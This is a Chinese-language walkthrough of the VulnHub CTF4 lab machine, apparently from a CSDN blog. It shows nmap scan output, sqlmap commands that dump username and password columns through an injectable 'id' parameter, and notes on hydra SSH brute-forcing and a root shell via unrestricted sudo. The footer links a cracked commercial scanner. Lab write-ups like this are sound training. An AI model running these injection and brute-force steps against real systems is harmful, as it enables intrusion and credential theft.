VunlnHub—CTF4


主机发现

使用nmap扫描网段,寻找靶机IP地址

sudo nmap 192.168.169.1/24


靶机的IP是192.168.169.143

端口探测

使用nmap进一步探测目标主机开放的端口
从扫描结果中可以看出,目标主机开放了22、25、80、631、960端口

kali@kali:~$ sudo nmap -A 192.168.169.143
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-19 10:45 EDT
Nmap scan report for 192.168.169.143
Host is up (0.00027s latency).
Not shown: 996 filtered ports
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 10:4a:18:f8:97:e0:72:27:b5:a4:33:93:3d:aa:9d:ef (DSA)
|_  2048 e7:70:d3:81:00:41:b8:6e:fd:31:ae:0e:00:ea:5c:b4 (RSA)
25/tcp  open   smtp    Sendmail 8.13.5/8.13.5
| smtp-commands: ctf4.sas.upenn.edu Hello [192.168.169.129], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP,
|_ 2.0.0 This is sendmail version 8.13.5 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp  open   http    Apache httpd 2.2.0 ((Fedora))
| http-robots.txt: 5 disallowed entries
|_/mail/ /restricted/ /conf/ /sql/ /admin/
|_http-server-header: Apache/2.2.0 (Fedora)
|_http-title:  Prof. Ehks
631/tcp closed ipp
MAC Address: 00:0C:29:73:BF:CB (VMware)
Device type: general purpose|proxy server|remote management|terminal server|switch|WAP
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (98%), SonicWALL embedded (95%), Control4 embedded (95%), Lantronix embedded (95%), SNR embedded (95%), Dell iDRAC 6 (94%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:sonicwall:aventail_ex-6000 cpe:/h:lantronix:slc_8 cpe:/h:snr:snr-s2960 cpe:/o:dell:idrac6_firmware cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel:4.1
Aggressive OS guesses: Linux 2.6.16 - 2.6.21 (98%), Linux 2.6.13 - 2.6.32 (96%), SonicWALL Aventail EX-6000 VPN appliance (95%), Control4 HC-300 home controller (95%), Lantronix SLC 8 terminal server (Linux 2.6) (95%), SNR SNR-S2960 switch (95%), Linux 2.6.8 - 2.6.30 (94%), Linux 2.6.9 - 2.6.18 (94%), Dell iDRAC 6 remote access controller (Linux 2.6) (94%), Linux 2.6.18 - 2.6.32 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: ctf4.sas.upenn.edu; OS: Unix


TRACEROUTE
HOP RTT     ADDRESS
1   0.27 ms 192.168.169.143


OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.32 seconds


先访问80端口

发现在下面这个链接中可能存在SQL注入漏洞

192.168.169.143/index.html?page=blog&title=Blog&id=2

注入

使用SQLMAP进行测试
获取Banner信息和数据库名

kali@kali:~$ sqlmap -u "192.168.169.143/index.html?page=blog&title=Blog&id=2" --banner --dbs


获取calendar库中的表名

kali@kali:~$ sqlmap -u "192.168.169.143/index.html?page=blog&title=Blog&id=2" --banner -D calendar --tables


获取phpc_users表中的字段名

kali@kali:~$ sqlmap -u "192.168.169.143/index.html?page=blog&title=Blog&id=2" --banner -D calendar -T phpc_users --columns


获取表中数据

kali@kali:~$ sqlmap -u "192.168.169.143/index.html?page=blog&title=Blog&id=2" --banner -D calendar -T phpc_users -C "username,password" --dump


获取ehks数据库中的用户信息

爆破

使用得到的账号密码尝试登录SSH
制作用户名和密码字典

使用hydra爆破密码

登录ssh

提权

使用sudo -l发现没有任何限制

使用sudo su直接可以切换到root用户

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

展开阅读全文

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 游动-白 设计师: 上身试试
应支付0元
点击重新获取
扫码支付

支付成功即可阅读